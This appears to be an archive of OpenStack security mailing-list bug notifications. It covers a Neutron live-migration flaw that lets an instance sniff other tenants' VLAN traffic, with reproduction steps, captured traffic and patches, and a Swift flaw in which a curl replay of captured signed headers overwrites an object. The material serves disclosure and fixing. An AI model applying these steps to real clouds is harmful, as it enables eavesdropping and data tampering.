fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1734320 at bugs.launchpad.net Fri Oct 18 14:33:54 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 18 Oct 2019 14:33:54 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157140923498.22358.18360929861738683954.malone@wampee.canonical.com> Reviewed: https://review.opendev.org/686346 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=9b0919e64809729f4c0186e9be63b1082510bbb1 Submitter: Zuul Branch: stable/queens commit 9b0919e64809729f4c0186e9be63b1082510bbb1 Author: Sean Mooney Date: Thu Nov 8 16:07:55 2018 +0000 raise priority of dead vlan drop - This change adds a max priority flow to drop all traffic that is associated with the DEAD VLAN 4095. - This change is part of a partial mitigation of bug 1734320. Without this change vlan 4095 traffic will be dropped via a low priority flow after being processed by part/all of the openflow pipeline. By raising the priorty and droping in table 0 we drop invalid packets as soon as they enter the pipeline. Conflicts: neutron/tests/unit/plugins/ml2/drivers/openvswitch/agent/openflow/native/test_br_int.py Change-Id: I3482c7c4f00942828cc9396cd2f3d646c9e8c9d1 Partial-Bug: #1734320 (cherry picked from commit e3dc447b908f57e9acc0378111b8e09cbd88ddc5) ** Tags added: in-stable-queens -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1765834 at bugs.launchpad.net Mon Oct 21 21:59:24 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 21 Oct 2019 21:59:24 -0000 Subject: [Openstack-security] [Bug 1765834] Fix proposed to swift (stable/rocky) References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <157169516412.9763.3447243012849909843.malone@soybean.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.opendev.org/689883 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From 1840895 at bugs.launchpad.net Tue Oct 22 19:44:35 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 22 Oct 2019 19:44:35 -0000 Subject: 